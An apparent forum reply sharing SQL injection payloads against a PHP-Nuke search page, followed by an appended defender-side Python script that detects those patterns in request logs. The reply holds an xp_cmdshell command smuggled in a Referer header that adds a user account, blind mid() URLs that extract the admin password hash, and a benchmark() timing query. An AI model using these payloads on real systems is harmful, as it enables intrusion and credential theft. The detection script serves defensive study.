here you go m8ty! i feel the power is strong in the young one.....

Select fishing involves utilizing the MySQL mid() function to return true if the character is guessed correctly, thereby returning a set of results to the screen.

GET /index.php HTTP/1.0
Host: yourhost
Referer: i-root-you'); exec master..xp_cmdshell 'net user test testpass /ADD' --

or

http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)=6&type=stories

then

To guess the next character in the sequence the attacker could use the following url:

http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,2,1)=1&type=stories

<snip>

When we modify the query to check if the first digit of the 'admin' password hash is equal to '1', we get the following result:

mysql> select pwd from nuke_authors where aid='admin' and if(mid(pwd,1,1)=1,benchmark(10000000,encode("AAAA","AAAA")),1)/*;
+----------------------------------+
| pwd                              |
+----------------------------------+
| 21232f297a57a5a743894a0e4a801fc3 |
+----------------------------------+

Hope that helps richie, though i doubt it =)

bill

"Music is the shorthand of emotion" - Leo Tolstoy

--==themode2k==--
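Added example (not part of the original post): a defender-side check that scans request paths for the patterns quoted above, i.e. a non-numeric `days` value, single-character `mid()` comparisons, and `benchmark()` timing calls, and groups the probed offsets per client. The log lines, the IP addresses and the assumption that `days` must be an integer are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed (client IP, request path) pairs; not taken from a real server log.
SAMPLE_LOG = [
    ("203.0.113.7", "/modules.php?name=search&query=&days=1+or+mid(a.pwd,1,1)=6&type=stories"),
    ("203.0.113.7", "/modules.php?name=search&query=&days=1+or+mid(a.pwd,2,1)=1&type=stories"),
    ("198.51.100.2", "/modules.php?name=search&query=midnight&days=7&type=stories"),
    ("198.51.100.9", "/modules.php?name=search&days=1+and+if(mid(pwd,1,1)=1,benchmark(10000000,encode(1,1)),1)"),
]

NUMERIC_PARAMS = {"days"}  # assumption: the application expects an integer here
# One-character substring comparison: mid(col, N, 1) = ...
SUBSTR_PROBE = re.compile(r"\b(?:mid|substring|substr)\s*\(\s*[\w.]+\s*,\s*(\d+)\s*,\s*1\s*\)\s*=", re.I)
# Functions used to turn a true/false condition into a response delay
TIMING_PROBE = re.compile(r"\b(?:benchmark|sleep)\s*\(", re.I)

def inspect_request(path):
    """Return (reason, detail) findings for the query string of one request."""
    findings = []
    for key, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if key in NUMERIC_PARAMS and not value.strip().isdigit():
            findings.append(("non_numeric", key))
        match = SUBSTR_PROBE.search(value)
        if match:
            findings.append(("substr_probe", int(match.group(1))))
        if TIMING_PROBE.search(value):
            findings.append(("timing_probe", key))
    return findings

def summarize(log):
    """Group findings per client; offsets walking 1, 2, ... show character-by-character guessing."""
    report = defaultdict(lambda: {"reasons": set(), "offsets": []})
    for ip, path in log:
        for reason, detail in inspect_request(path):
            report[ip]["reasons"].add(reason)
            if reason == "substr_probe":
                report[ip]["offsets"].append(detail)
    return dict(report)

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, sorted(info["reasons"]), info["offsets"])
```

The same integer check applied in the application itself (rejecting any `days` value that is not all digits before it reaches the query) removes the injection point rather than only detecting it.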